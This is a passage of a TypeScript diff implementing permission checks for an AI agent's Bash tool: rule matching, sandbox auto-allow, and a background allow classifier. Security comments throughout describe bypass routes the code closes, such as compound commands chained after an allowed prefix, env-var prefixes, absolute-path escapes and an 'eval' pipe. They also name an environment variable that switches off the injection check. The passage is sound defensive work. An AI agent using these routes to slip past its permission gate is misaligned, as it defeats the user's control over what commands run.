+ // and deny rules like Bash(rm:*) to block "xargs rm file".
905
+ // Natural word-boundary: "xargs -n1 grep" does NOT start with
906
+ // "xargs grep " so flagged xargs invocations are not matched.
907
+ const xargsPrefix = 'xargs ' + bashRule.prefix
908
+ if (cmdToMatch === xargsPrefix) {
909
+ return true
910
+ }
911
+ return cmdToMatch.startsWith(xargsPrefix + ' ')
912
+ }
913
+ }
914
+ break
915
+ case 'wildcard':
916
+ // SECURITY FIX: In exact match mode, wildcards must NOT match because we're
917
+ // checking the full unparsed command. Wildcard matching on unparsed commands
918
+ // allows "foo *" to match "foo arg && curl evil.com" since .* matches operators.
919
+ // Wildcards should only match after splitting into individual subcommands.
920
+ if (matchMode === 'exact') {
921
+ return false
922
+ }
923
+ // SECURITY: Same as for prefix rules, don't allow wildcard rules to match
924
+ // compound commands in prefix mode. e.g., Bash(cd *) must not match
925
+ // "cd /path && python3 evil.py" even though "cd *" pattern would match it.
926
+ if (isCompoundCommand.get(cmdToMatch)) {
927
+ return false
928
+ }
929
+ // In prefix mode (after splitting), wildcards can safely match subcommands
930
+ return matchWildcardPattern(bashRule.pattern, cmdToMatch)
931
+ }
932
+ })
933
+ })
934
+ .map(([, rule]) => rule)
935
+ }
936
+
937
+ function matchingRulesForInput(
938
+ input: z.infer<typeof BashTool.inputSchema>,
939
+ toolPermissionContext: ToolPermissionContext,
940
+ matchMode: 'exact' | 'prefix',
941
+ { skipCompoundCheck = false }: { skipCompoundCheck?: boolean } = {},
942
+ ) {
943
+ const denyRuleByContents = getRuleByContentsForTool(
944
+ toolPermissionContext,
945
+ BashTool,
946
+ 'deny',
947
+ )
948
+ // SECURITY: Deny/ask rules use aggressive env var stripping so that
949
+ // `FOO=bar denied_command` still matches a deny rule for `denied_command`.
950
+ const matchingDenyRules = filterRulesByContentsMatchingInput(
951
+ input,
952
+ denyRuleByContents,
953
+ matchMode,
954
+ { stripAllEnvVars: true, skipCompoundCheck: true },
955
+ )
956
+
957
+ const askRuleByContents = getRuleByContentsForTool(
958
+ toolPermissionContext,
959
+ BashTool,
960
+ 'ask',
961
+ )
962
+ const matchingAskRules = filterRulesByContentsMatchingInput(
963
+ input,
964
+ askRuleByContents,
965
+ matchMode,
966
+ { stripAllEnvVars: true, skipCompoundCheck: true },
967
+ )
968
+
969
+ const allowRuleByContents = getRuleByContentsForTool(
970
+ toolPermissionContext,
971
+ BashTool,
972
+ 'allow',
973
+ )
974
+ const matchingAllowRules = filterRulesByContentsMatchingInput(
975
+ input,
976
+ allowRuleByContents,
977
+ matchMode,
978
+ { skipCompoundCheck },
979
+ )
980
+
981
+ return {
982
+ matchingDenyRules,
983
+ matchingAskRules,
984
+ matchingAllowRules,
985
+ }
986
+ }
987
+
988
+ /**
989
+ * Checks if the subcommand is an exact match for a permission rule
990
+ */
991
+ export const bashToolCheckExactMatchPermission = (
992
+ input: z.infer<typeof BashTool.inputSchema>,
993
+ toolPermissionContext: ToolPermissionContext,
994
+ ): PermissionResult => {
995
+ const command = input.command.trim()
996
+ const { matchingDenyRules, matchingAskRules, matchingAllowRules } =
997
+ matchingRulesForInput(input, toolPermissionContext, 'exact')
998
+
999
+ // 1. Deny if exact command was denied
1000
+ if (matchingDenyRules[0] !== undefined) {
1001
+ return {
1002
+ behavior: 'deny',
1003
+ message: `Permission to use ${BashTool.name} with command ${command} has been denied.`,
1004
+ decisionReason: {
1005
+ type: 'rule',
1006
+ rule: matchingDenyRules[0],
1007
+ },
1008
+ }
1009
+ }
1010
+
1011
+ // 2. Ask if exact command was in ask rules
1012
+ if (matchingAskRules[0] !== undefined) {
1013
+ return {
1014
+ behavior: 'ask',
1015
+ message: createPermissionRequestMessage(BashTool.name),
1016
+ decisionReason: {
1017
+ type: 'rule',
1018
+ rule: matchingAskRules[0],
1019
+ },
1020
+ }
1021
+ }
1022
+
1023
+ // 3. Allow if exact command was allowed
1024
+ if (matchingAllowRules[0] !== undefined) {
1025
+ return {
1026
+ behavior: 'allow',
1027
+ updatedInput: input,
1028
+ decisionReason: {
1029
+ type: 'rule',
1030
+ rule: matchingAllowRules[0],
1031
+ },
1032
+ }
1033
+ }
1034
+
1035
+ // 4. Otherwise, passthrough
1036
+ const decisionReason = {
1037
+ type: 'other' as const,
1038
+ reason: 'This command requires approval',
1039
+ }
1040
+ return {
1041
+ behavior: 'passthrough',
1042
+ message: createPermissionRequestMessage(BashTool.name, decisionReason),
1043
+ decisionReason,
1044
+ // Suggest exact match rule to user
1045
+ // this may be overridden by prefix suggestions in `checkCommandAndSuggestRules()`
1046
+ suggestions: suggestionForExactCommand(command),
1047
+ }
1048
+ }
1049
+
1050
+ export const bashToolCheckPermission = (
1051
+ input: z.infer<typeof BashTool.inputSchema>,
1052
+ toolPermissionContext: ToolPermissionContext,
1053
+ compoundCommandHasCd?: boolean,
1054
+ astCommand?: SimpleCommand,
1055
+ ): PermissionResult => {
1056
+ const command = input.command.trim()
1057
+
1058
+ // 1. Check exact match first
1059
+ const exactMatchResult = bashToolCheckExactMatchPermission(
1060
+ input,
1061
+ toolPermissionContext,
1062
+ )
1063
+
1064
+ // 1a. Deny/ask if exact command has a rule
1065
+ if (
1066
+ exactMatchResult.behavior === 'deny' ||
1067
+ exactMatchResult.behavior === 'ask'
1068
+ ) {
1069
+ return exactMatchResult
1070
+ }
1071
+
1072
+ // 2. Find all matching rules (prefix or exact)
1073
+ // SECURITY FIX: Check Bash deny/ask rules BEFORE path constraints to prevent bypass
1074
+ // via absolute paths outside the project directory (HackerOne report)
1075
+ // When AST-parsed, the subcommand is already atomic — skip the legacy
1076
+ // splitCommand re-check that misparses mid-word # as compound.
1077
+ const { matchingDenyRules, matchingAskRules, matchingAllowRules } =
1078
+ matchingRulesForInput(input, toolPermissionContext, 'prefix', {
1079
+ skipCompoundCheck: astCommand !== undefined,
1080
+ })
1081
+
1082
+ // 2a. Deny if command has a deny rule
1083
+ if (matchingDenyRules[0] !== undefined) {
1084
+ return {
1085
+ behavior: 'deny',
1086
+ message: `Permission to use ${BashTool.name} with command ${command} has been denied.`,
1087
+ decisionReason: {
1088
+ type: 'rule',
1089
+ rule: matchingDenyRules[0],
1090
+ },
1091
+ }
1092
+ }
1093
+
1094
+ // 2b. Ask if command has an ask rule
1095
+ if (matchingAskRules[0] !== undefined) {
1096
+ return {
1097
+ behavior: 'ask',
1098
+ message: createPermissionRequestMessage(BashTool.name),
1099
+ decisionReason: {
1100
+ type: 'rule',
1101
+ rule: matchingAskRules[0],
1102
+ },
1103
+ }
1104
+ }
1105
+
1106
+ // 3. Check path constraints
1107
+ // This check comes after deny/ask rules so explicit rules take precedence.
1108
+ // SECURITY: When AST-derived argv is available for this subcommand, pass
1109
+ // it through so checkPathConstraints uses it directly instead of re-parsing
1110
+ // with shell-quote (which has a single-quote backslash bug that causes
1111
+ // parseCommandArguments to return [] and silently skip path validation).
1112
+ const pathResult = checkPathConstraints(
1113
+ input,
1114
+ getCwd(),
1115
+ toolPermissionContext,
1116
+ compoundCommandHasCd,
1117
+ astCommand?.redirects,
1118
+ astCommand ? [astCommand] : undefined,
1119
+ )
1120
+ if (pathResult.behavior !== 'passthrough') {
1121
+ return pathResult
1122
+ }
1123
+
1124
+ // 4. Allow if command had an exact match allow
1125
+ if (exactMatchResult.behavior === 'allow') {
1126
+ return exactMatchResult
1127
+ }
1128
+
1129
+ // 5. Allow if command has an allow rule
1130
+ if (matchingAllowRules[0] !== undefined) {
1131
+ return {
1132
+ behavior: 'allow',
1133
+ updatedInput: input,
1134
+ decisionReason: {
1135
+ type: 'rule',
1136
+ rule: matchingAllowRules[0],
1137
+ },
1138
+ }
1139
+ }
1140
+
1141
+ // 5b. Check sed constraints (blocks dangerous sed operations before mode auto-allow)
1142
+ const sedConstraintResult = checkSedConstraints(input, toolPermissionContext)
1143
+ if (sedConstraintResult.behavior !== 'passthrough') {
1144
+ return sedConstraintResult
1145
+ }
1146
+
1147
+ // 6. Check for mode-specific permission handling
1148
+ const modeResult = checkPermissionMode(input, toolPermissionContext)
1149
+ if (modeResult.behavior !== 'passthrough') {
1150
+ return modeResult
1151
+ }
1152
+
1153
+ // 7. Check read-only rules
1154
+ if (BashTool.isReadOnly(input)) {
1155
+ return {
1156
+ behavior: 'allow',
1157
+ updatedInput: input,
1158
+ decisionReason: {
1159
+ type: 'other',
1160
+ reason: 'Read-only command is allowed',
1161
+ },
1162
+ }
1163
+ }
1164
+
1165
+ // 8. Passthrough since no rules match, will trigger permission prompt
1166
+ const decisionReason = {
1167
+ type: 'other' as const,
1168
+ reason: 'This command requires approval',
1169
+ }
1170
+ return {
1171
+ behavior: 'passthrough',
1172
+ message: createPermissionRequestMessage(BashTool.name, decisionReason),
1173
+ decisionReason,
1174
+ // Suggest exact match rule to user
1175
+ // this may be overridden by prefix suggestions in `checkCommandAndSuggestRules()`
1176
+ suggestions: suggestionForExactCommand(command),
1177
+ }
1178
+ }
1179
+
1180
+ /**
1181
+ * Processes an individual subcommand and applies prefix checks & suggestions
1182
+ */
1183
+ export async function checkCommandAndSuggestRules(
1184
+ input: z.infer<typeof BashTool.inputSchema>,
1185
+ toolPermissionContext: ToolPermissionContext,
1186
+ commandPrefixResult: CommandPrefixResult | null | undefined,
1187
+ compoundCommandHasCd?: boolean,
1188
+ astParseSucceeded?: boolean,
1189
+ ): Promise<PermissionResult> {
1190
+ // 1. Check exact match first
1191
+ const exactMatchResult = bashToolCheckExactMatchPermission(
1192
+ input,
1193
+ toolPermissionContext,
1194
+ )
1195
+ if (exactMatchResult.behavior !== 'passthrough') {
1196
+ return exactMatchResult
1197
+ }
1198
+
1199
+ // 2. Check the command prefix
1200
+ const permissionResult = bashToolCheckPermission(
1201
+ input,
1202
+ toolPermissionContext,
1203
+ compoundCommandHasCd,
1204
+ )
1205
+ // 2a. Deny/ask if command was explictly denied/asked
1206
+ if (
1207
+ permissionResult.behavior === 'deny' ||
1208
+ permissionResult.behavior === 'ask'
1209
+ ) {
1210
+ return permissionResult
1211
+ }
1212
+
1213
+ // 3. Ask for permission if command injection is detected. Skip when the
1214
+ // AST parse already succeeded — tree-sitter has verified there are no
1215
+ // hidden substitutions or structural tricks, so the legacy regex-based
1216
+ // validators (backslash-escaped operators, etc.) would only add FPs.
1217
+ if (
1218
+ !astParseSucceeded &&
1219
+ !isEnvTruthy(process.env.CLAUDE_CODE_DISABLE_COMMAND_INJECTION_CHECK)
1220
+ ) {
1221
+ const safetyResult = await bashCommandIsSafeAsync(input.command)
1222
+
1223
+ if (safetyResult.behavior !== 'passthrough') {
1224
+ const decisionReason: PermissionDecisionReason = {
1225
+ type: 'other' as const,
1226
+ reason:
1227
+ safetyResult.behavior === 'ask' && safetyResult.message
1228
+ ? safetyResult.message
1229
+ : 'This command contains patterns that could pose security risks and requires approval',
1230
+ }
1231
+
1232
+ return {
1233
+ behavior: 'ask',
1234
+ message: createPermissionRequestMessage(BashTool.name, decisionReason),
1235
+ decisionReason,
1236
+ suggestions: [], // Don't suggest saving a potentially dangerous command
1237
+ }
1238
+ }
1239
+ }
1240
+
1241
+ // 4. Allow if command was allowed
1242
+ if (permissionResult.behavior === 'allow') {
1243
+ return permissionResult
1244
+ }
1245
+
1246
+ // 5. Suggest prefix if available, otherwise exact command
1247
+ const suggestedUpdates = commandPrefixResult?.commandPrefix
1248
+ ? suggestionForPrefix(commandPrefixResult.commandPrefix)
1249
+ : suggestionForExactCommand(input.command)
1250
+
1251
+ return {
1252
+ ...permissionResult,
1253
+ suggestions: suggestedUpdates,
1254
+ }
1255
+ }
1256
+
1257
+ /**
1258
+ * Checks if a command should be auto-allowed when sandboxed.
1259
+ * Returns early if there are explicit deny/ask rules that should be respected.
1260
+ *
1261
+ * NOTE: This function should only be called when sandboxing and auto-allow are enabled.
1262
+ *
1263
+ * @param input - The bash tool input
1264
+ * @param toolPermissionContext - The permission context
1265
+ * @returns PermissionResult with:
1266
+ * - deny/ask if explicit rule exists (exact or prefix)
1267
+ * - allow if no explicit rules (sandbox auto-allow applies)
1268
+ * - passthrough should not occur since we're in auto-allow mode
1269
+ */
1270
+ function checkSandboxAutoAllow(
1271
+ input: z.infer<typeof BashTool.inputSchema>,
1272
+ toolPermissionContext: ToolPermissionContext,
1273
+ ): PermissionResult {
1274
+ const command = input.command.trim()
1275
+
1276
+ // Check for explicit deny/ask rules on the full command (exact + prefix)
1277
+ const { matchingDenyRules, matchingAskRules } = matchingRulesForInput(
1278
+ input,
1279
+ toolPermissionContext,
1280
+ 'prefix',
1281
+ )
1282
+
1283
+ // Return immediately if there's an explicit deny rule on the full command
1284
+ if (matchingDenyRules[0] !== undefined) {
1285
+ return {
1286
+ behavior: 'deny',
1287
+ message: `Permission to use ${BashTool.name} with command ${command} has been denied.`,
1288
+ decisionReason: {
1289
+ type: 'rule',
1290
+ rule: matchingDenyRules[0],
1291
+ },
1292
+ }
1293
+ }
1294
+
1295
+ // SECURITY: For compound commands, check each subcommand against deny/ask
1296
+ // rules. Prefix rules like Bash(rm:*) won't match the full compound command
1297
+ // (e.g., "echo hello && rm -rf /" doesn't start with "rm"), so we must
1298
+ // check each subcommand individually.
1299
+ // IMPORTANT: Subcommand deny checks must run BEFORE full-command ask returns.
1300
+ // Otherwise a wildcard ask rule matching the full command (e.g., Bash(*echo*))
1301
+ // would return 'ask' before a prefix deny rule on a subcommand (e.g., Bash(rm:*))
1302
+ // gets checked, downgrading a deny to an ask.
1303
+ const subcommands = splitCommand(command)
1304
+ if (subcommands.length > 1) {
1305
+ let firstAskRule: PermissionRule | undefined
1306
+ for (const sub of subcommands) {
1307
+ const subResult = matchingRulesForInput(
1308
+ { command: sub },
1309
+ toolPermissionContext,
1310
+ 'prefix',
1311
+ )
1312
+ // Deny takes priority — return immediately
1313
+ if (subResult.matchingDenyRules[0] !== undefined) {
1314
+ return {
1315
+ behavior: 'deny',
1316
+ message: `Permission to use ${BashTool.name} with command ${command} has been denied.`,
1317
+ decisionReason: {
1318
+ type: 'rule',
1319
+ rule: subResult.matchingDenyRules[0],
1320
+ },
1321
+ }
1322
+ }
1323
+ // Stash first ask match; don't return yet (deny across all subs takes priority)
1324
+ firstAskRule ??= subResult.matchingAskRules[0]
1325
+ }
1326
+ if (firstAskRule) {
1327
+ return {
1328
+ behavior: 'ask',
1329
+ message: createPermissionRequestMessage(BashTool.name),
1330
+ decisionReason: {
1331
+ type: 'rule',
1332
+ rule: firstAskRule,
1333
+ },
1334
+ }
1335
+ }
1336
+ }
1337
+
1338
+ // Full-command ask check (after all deny sources have been exhausted)
1339
+ if (matchingAskRules[0] !== undefined) {
1340
+ return {
1341
+ behavior: 'ask',
1342
+ message: createPermissionRequestMessage(BashTool.name),
1343
+ decisionReason: {
1344
+ type: 'rule',
1345
+ rule: matchingAskRules[0],
1346
+ },
1347
+ }
1348
+ }
1349
+ // No explicit rules, so auto-allow with sandbox
1350
+
1351
+ return {
1352
+ behavior: 'allow',
1353
+ updatedInput: input,
1354
+ decisionReason: {
1355
+ type: 'other',
1356
+ reason: 'Auto-allowed with sandbox (autoAllowBashIfSandboxed enabled)',
1357
+ },
1358
+ }
1359
+ }
1360
+
1361
+ /**
1362
+ * Filter out `cd ${cwd}` prefix subcommands, keeping astCommands aligned.
1363
+ * Extracted to keep bashToolHasPermission under Bun's feature() DCE
1364
+ * complexity threshold — inlining this breaks pendingClassifierCheck
1365
+ * attachment in ~10 classifier tests.
1366
+ */
1367
+ function filterCdCwdSubcommands(
1368
+ rawSubcommands: string[],
1369
+ astCommands: SimpleCommand[] | undefined,
1370
+ cwd: string,
1371
+ cwdMingw: string,
1372
+ ): { subcommands: string[]; astCommandsByIdx: (SimpleCommand | undefined)[] } {
1373
+ const subcommands: string[] = []
1374
+ const astCommandsByIdx: (SimpleCommand | undefined)[] = []
1375
+ for (let i = 0; i < rawSubcommands.length; i++) {
1376
+ const cmd = rawSubcommands[i]!
1377
+ if (cmd === `cd ${cwd}` || cmd === `cd ${cwdMingw}`) continue
1378
+ subcommands.push(cmd)
1379
+ astCommandsByIdx.push(astCommands?.[i])
1380
+ }
1381
+ return { subcommands, astCommandsByIdx }
1382
+ }
1383
+
1384
+ /**
1385
+ * Early-exit deny enforcement for the AST too-complex and checkSemantics
1386
+ * paths. Returns the exact-match result if non-passthrough (deny/ask/allow),
1387
+ * then checks prefix/wildcard deny rules. Returns null if neither matched,
1388
+ * meaning the caller should fall through to ask. Extracted to keep
1389
+ * bashToolHasPermission under Bun's feature() DCE complexity threshold.
1390
+ */
1391
+ function checkEarlyExitDeny(
1392
+ input: z.infer<typeof BashTool.inputSchema>,
1393
+ toolPermissionContext: ToolPermissionContext,
1394
+ ): PermissionResult | null {
1395
+ const exactMatchResult = bashToolCheckExactMatchPermission(
1396
+ input,
1397
+ toolPermissionContext,
1398
+ )
1399
+ if (exactMatchResult.behavior !== 'passthrough') {
1400
+ return exactMatchResult
1401
+ }
1402
+ const denyMatch = matchingRulesForInput(
1403
+ input,
1404
+ toolPermissionContext,
1405
+ 'prefix',
1406
+ ).matchingDenyRules[0]
1407
+ if (denyMatch !== undefined) {
1408
+ return {
1409
+ behavior: 'deny',
1410
+ message: `Permission to use ${BashTool.name} with command ${input.command} has been denied.`,
1411
+ decisionReason: { type: 'rule', rule: denyMatch },
1412
+ }
1413
+ }
1414
+ return null
1415
+ }
1416
+
1417
+ /**
1418
+ * checkSemantics-path deny enforcement. Calls checkEarlyExitDeny (exact-match
1419
+ * + full-command prefix deny), then checks each individual SimpleCommand .text
1420
+ * span against prefix deny rules. The per-subcommand check is needed because
1421
+ * filterRulesByContentsMatchingInput has a compound-command guard
1422
+ * (splitCommand().length > 1 → prefix rules return false) that defeats
1423
+ * `Bash(eval:*)` matching against a full pipeline like `echo foo | eval rm`.
1424
+ * Each SimpleCommand span is a single command, so the guard doesn't fire.
1425
+ *
1426
+ * Separate helper (not folded into checkEarlyExitDeny or inlined at the call
1427
+ * site) because bashToolHasPermission is tight against Bun's feature() DCE
1428
+ * complexity threshold — adding even ~5 lines there breaks
1429
+ * feature('BASH_CLASSIFIER') evaluation and drops pendingClassifierCheck.
1430
+ */
1431
+ function checkSemanticsDeny(
1432
+ input: z.infer<typeof BashTool.inputSchema>,
1433
+ toolPermissionContext: ToolPermissionContext,
1434
+ commands: readonly { text: string }[],
1435
+ ): PermissionResult | null {
1436
+ const fullCmd = checkEarlyExitDeny(input, toolPermissionContext)
1437
+ if (fullCmd !== null) return fullCmd
1438
+ for (const cmd of commands) {
1439
+ const subDeny = matchingRulesForInput(
1440
+ { ...input, command: cmd.text },
1441
+ toolPermissionContext,
1442
+ 'prefix',
1443
+ ).matchingDenyRules[0]
1444
+ if (subDeny !== undefined) {
1445
+ return {
1446
+ behavior: 'deny',
1447
+ message: `Permission to use ${BashTool.name} with command ${input.command} has been denied.`,
1448
+ decisionReason: { type: 'rule', rule: subDeny },
1449
+ }
1450
+ }
1451
+ }
1452
+ return null
1453
+ }
1454
+
1455
+ /**
1456
+ * Builds the pending classifier check metadata if classifier is enabled and has allow descriptions.
1457
+ * Returns undefined if classifier is disabled, in auto mode, or no allow descriptions exist.
1458
+ */
1459
+ function buildPendingClassifierCheck(
1460
+ command: string,
1461
+ toolPermissionContext: ToolPermissionContext,
1462
+ ): { command: string; cwd: string; descriptions: string[] } | undefined {
1463
+ if (!isClassifierPermissionsEnabled()) {
1464
+ return undefined
1465
+ }
1466
+ // Skip in auto mode - auto mode classifier handles all permission decisions
1467
+ if (feature('TRANSCRIPT_CLASSIFIER') && toolPermissionContext.mode === 'auto')
1468
+ return undefined
1469
+ if (toolPermissionContext.mode === 'bypassPermissions') return undefined
1470
+
1471
+ const allowDescriptions = getBashPromptAllowDescriptions(
1472
+ toolPermissionContext,
1473
+ )
1474
+ if (allowDescriptions.length === 0) return undefined
1475
+
1476
+ return {
1477
+ command,
1478
+ cwd: getCwd(),
1479
+ descriptions: allowDescriptions,
1480
+ }
1481
+ }
1482
+
1483
+ const speculativeChecks = new Map<string, Promise<ClassifierResult>>()
1484
+
1485
+ /**
1486
+ * Start a speculative bash allow classifier check early, so it runs in
1487
+ * parallel with pre-tool hooks, deny/ask classifiers, and permission dialog setup.
1488
+ * The result can be consumed later by executeAsyncClassifierCheck via
1489
+ * consumeSpeculativeClassifierCheck.
1490
+ */
1491
+ export function peekSpeculativeClassifierCheck(
1492
+ command: string,
1493
+ ): Promise<ClassifierResult> | undefined {
1494
+ return speculativeChecks.get(command)
1495
+ }
1496
+
1497
+ export function startSpeculativeClassifierCheck(
1498
+ command: string,
1499
+ toolPermissionContext: ToolPermissionContext,
1500
+ signal: AbortSignal,
1501
+ isNonInteractiveSession: boolean,
1502
+ ): boolean {
1503
+ // Same guards as buildPendingClassifierCheck
1504
+ if (!isClassifierPermissionsEnabled()) return false
1505
+ if (feature('TRANSCRIPT_CLASSIFIER') && toolPermissionContext.mode === 'auto')
1506
+ return false
1507
+ if (toolPermissionContext.mode === 'bypassPermissions') return false
1508
+ const allowDescriptions = getBashPromptAllowDescriptions(
1509
+ toolPermissionContext,
1510
+ )
1511
+ if (allowDescriptions.length === 0) return false
1512
+
1513
+ const cwd = getCwd()
1514
+ const promise = classifyBashCommand(
1515
+ command,
1516
+ cwd,
1517
+ allowDescriptions,
1518
+ 'allow',
1519
+ signal,
1520
+ isNonInteractiveSession,
1521
+ )
1522
+ // Prevent unhandled rejection if the signal aborts before this promise is consumed.
1523
+ // The original promise (which may reject) is still stored in the Map for consumers to await.
1524
+ promise.catch(() => {})
1525
+ speculativeChecks.set(command, promise)
1526
+ return true
1527
+ }
1528
+
1529
+ /**
1530
+ * Consume a speculative classifier check result for the given command.
1531
+ * Returns the promise if one exists (and removes it from the map), or undefined.
1532
+ */
1533
+ export function consumeSpeculativeClassifierCheck(
1534
+ command: string,
1535
+ ): Promise<ClassifierResult> | undefined {
1536
+ const promise = speculativeChecks.get(command)
1537
+ if (promise) {
1538
+ speculativeChecks.delete(command)
1539
+ }
1540
+ return promise
1541
+ }
1542
+
1543
+ export function clearSpeculativeChecks(): void {
1544
+ speculativeChecks.clear()
1545
+ }
1546
+
1547
+ /**
1548
+ * Await a pending classifier check and return a PermissionDecisionReason if
1549
+ * high-confidence allow, or undefined otherwise.
1550
+ *
1551
+ * Used by swarm agents (both tmux and in-process) to gate permission
1552
+ * forwarding: run the classifier first, and only escalate to the leader
1553
+ * if the classifier doesn't auto-approve.
1554
+ */
1555
+ export async function awaitClassifierAutoApproval(
1556
+ pendingCheck: PendingClassifierCheck,
1557
+ signal: AbortSignal,
1558
+ isNonInteractiveSession: boolean,
1559
+ ): Promise<PermissionDecisionReason | undefined> {
1560
+ const { command, cwd, descriptions } = pendingCheck
1561
+ const speculativeResult = consumeSpeculativeClassifierCheck(command)
1562
+ const classifierResult = speculativeResult
1563
+ ? await speculativeResult
1564
+ : await classifyBashCommand(
1565
+ command,
1566
+ cwd,
1567
+ descriptions,
1568
+ 'allow',
1569
+ signal,
1570
+ isNonInteractiveSession,
1571
+ )
1572
+
1573
+ logClassifierResultForAnts(command, 'allow', descriptions, classifierResult)
1574
+
1575
+ if (
1576
+ feature('BASH_CLASSIFIER') &&
1577
+ classifierResult.matches &&
1578
+ classifierResult.confidence === 'high'
1579
+ ) {
1580
+ return {
1581
+ type: 'classifier',
1582
+ classifier: 'bash_allow',
1583
+ reason: `Allowed by prompt rule: "${classifierResult.matchedDescription}"`,
1584
+ }
1585
+ }
1586
+ return undefined
1587
+ }
1588
+
1589
+ type AsyncClassifierCheckCallbacks = {
1590
+ shouldContinue: () => boolean
1591
+ onAllow: (decisionReason: PermissionDecisionReason) => void
1592
+ onComplete?: () => void
1593
+ }
1594
+
1595
+ /**
1596
+ * Execute the bash allow classifier check asynchronously.
1597
+ * This runs in the background while the permission prompt is shown.
1598
+ * If the classifier allows with high confidence and the user hasn't interacted, auto-approves.
1599
+ *
1600
+ * @param pendingCheck - Classifier check metadata from bashToolHasPermission
1601
+ * @param signal - Abort signal
1602
+ * @param isNonInteractiveSession - Whether this is a non-interactive session
1603
+ * @param callbacks - Callbacks to check if we should continue and handle approval
1604
+ */
1605
+ export async function executeAsyncClassifierCheck(
1606
+ pendingCheck: { command: string; cwd: string; descriptions: string[] },
1607
+ signal: AbortSignal,
1608
+ isNonInteractiveSession: boolean,
1609
+ callbacks: AsyncClassifierCheckCallbacks,
1610
+ ): Promise<void> {
1611
+ const { command, cwd, descriptions } = pendingCheck
1612
+ const speculativeResult = consumeSpeculativeClassifierCheck(command)
1613
+
1614
+ let classifierResult: ClassifierResult
1615
+ try {
1616
+ classifierResult = speculativeResult
1617
+ ? await speculativeResult
1618
+ : await classifyBashCommand(
1619
+ command,
1620
+ cwd,
1621
+ descriptions,
1622
+ 'allow',
1623
+ signal,
1624
+ isNonInteractiveSession,
1625
+ )
1626
+ } catch (error: unknown) {
1627
+ // When the coordinator session is cancelled, the abort signal fires and the
1628
+ // classifier API call rejects with APIUserAbortError. This is expected and
1629
+ // should not surface as an unhandled promise rejection.
1630
+ if (error instanceof APIUserAbortError || error instanceof AbortError) {
1631
+ callbacks.onComplete?.()
1632
+ return
1633
+ }
1634
+ callbacks.onComplete?.()
1635
+ throw error
1636
+ }
1637
+
1638
+ logClassifierResultForAnts(command, 'allow', descriptions, classifierResult)
1639
+
1640
+ // Don't auto-approve if user already made a decision or has interacted
1641
+ // with the permission dialog (e.g., arrow keys, tab, typing)
1642
+ if (!callbacks.shouldContinue()) return
1643
+
1644
+ if (
1645
+ feature('BASH_CLASSIFIER') &&
1646
+ classifierResult.matches &&
1647
+ classifierResult.confidence === 'high'
1648
+ ) {
1649
+ callbacks.onAllow({
1650
+ type: 'classifier',
1651
+ classifier: 'bash_allow',
1652
+ reason: `Allowed by prompt rule: "${classifierResult.matchedDescription}"`,
1653
+ })
1654
+ } else {
1655
+ // No match — notify so the checking indicator is cleared
1656
+ callbacks.onComplete?.()
1657
+ }
1658
+ }
1659
+
1660
+ /**
1661
+ * The main implementation to check if we need to ask for user permission to call BashTool with a given input
1662
+ */
1663
+ export async function bashToolHasPermission(
1664
+ input: z.infer<typeof BashTool.inputSchema>,
1665
+ context: ToolUseContext,
1666
+ getCommandSubcommandPrefixFn = getCommandSubcommandPrefix,
1667
+ ): Promise<PermissionResult> {
1668
+ let appState = context.getAppState()
1669
+
1670
+ // 0. AST-based security parse. This replaces both tryParseShellCommand
1671
+ // (the shell-quote pre-check) and the bashCommandIsSafe misparsing gate.
1672
+ // tree-sitter produces either a clean SimpleCommand[] (quotes resolved,
1673
+ // no hidden substitutions) or 'too-complex' — which is exactly the signal
1674
+ // we need to decide whether splitCommand's output can be trusted.
1675
+ //
1676
+ // When tree-sitter WASM is unavailable OR the injection check is disabled
1677
+ // via env var, we fall back to the old path (legacy gate at ~1370 runs).
1678
+ const injectionCheckDisabled = isEnvTruthy(
1679
+ process.env.CLAUDE_CODE_DISABLE_COMMAND_INJECTION_CHECK,
1680
+ )
1681
+ // GrowthBook killswitch for shadow mode — when off, skip the native parse
1682
+ // entirely. Computed once; feature() must stay inline in the ternary below.
1683
+ const shadowEnabled = feature('TREE_SITTER_BASH_SHADOW')
1684
+ ? getFeatureValue_CACHED_MAY_BE_STALE('tengu_birch_trellis', true)
1685
+ : false
1686
+ // Parse once here; the resulting AST feeds both parseForSecurityFromAst
1687
+ // and bashToolCheckCommandOperatorPermissions.
1688
+ let astRoot = injectionCheckDisabled
1689
+ ? null
1690
+ : feature('TREE_SITTER_BASH_SHADOW') && !shadowEnabled
1691
+ ? null
1692
+ : await parseCommandRaw(input.command)
1693
+ let astResult: ParseForSecurityResult = astRoot
1694
+ ? parseForSecurityFromAst(input.command, astRoot)
1695
+ : { kind: 'parse-unavailable' }
1696
+ let astSubcommands: string[] | null = null
1697
+ let astRedirects: Redirect[] | undefined
1698
+ let astCommands: SimpleCommand[] | undefined
1699
+ let shadowLegacySubs: string[] | undefined
1700
+
1701
+ // Shadow-test tree-sitter: record its verdict, then force parse-unavailable
1702
+ // so the legacy path stays authoritative. parseCommand stays gated on
1703
+ // TREE_SITTER_BASH (not SHADOW) so legacy internals remain pure regex.
1704
+ // One event per bash call captures both divergence AND unavailability
1705
+ // reasons; module-load failures are separately covered by the
1706
+ // session-scoped tengu_tree_sitter_load event.
1707
+ if (feature('TREE_SITTER_BASH_SHADOW')) {
1708
+ const available = astResult.kind !== 'parse-unavailable'
1709
+ let tooComplex = false
1710
+ let semanticFail = false
1711
+ let subsDiffer = false
1712
+ if (available) {
1713
+ tooComplex = astResult.kind === 'too-complex'
1714
+ semanticFail =
1715
+ astResult.kind === 'simple' && !checkSemantics(astResult.commands).ok
1716
+ const tsSubs =
1717
+ astResult.kind === 'simple'
1718
+ ? astResult.commands.map(c => c.text)
1719
+ : undefined
1720
+ const legacySubs = splitCommand(input.command)
1721
+ shadowLegacySubs = legacySubs
1722
+ subsDiffer =
1723
+ tsSubs !== undefined &&
1724
+ (tsSubs.length !== legacySubs.length ||
1725
+ tsSubs.some((s, i) => s !== legacySubs[i]))
1726
+ }
1727
+ logEvent('tengu_tree_sitter_shadow', {
1728
+ available,
1729
+ astTooComplex: tooComplex,
1730
+ astSemanticFail: semanticFail,
1731
+ subsDiffer,
1732
+ injectionCheckDisabled,
1733
+ killswitchOff: !shadowEnabled,
1734
+ cmdOverLength: input.command.length > 10000,
1735
+ })
1736
+ // Always force legacy — shadow mode is observational only.
1737
+ astResult = { kind: 'parse-unavailable' }
1738
+ astRoot = null
1739
+ }
1740
+
1741
+ if (astResult.kind === 'too-complex') {
1742
+ // Parse succeeded but found structure we can't statically analyze
1743
+ // (command substitution, expansion, control flow, parser differential).
1744
+ // Respect exact-match deny/ask/allow, then prefix/wildcard deny. Only
1745
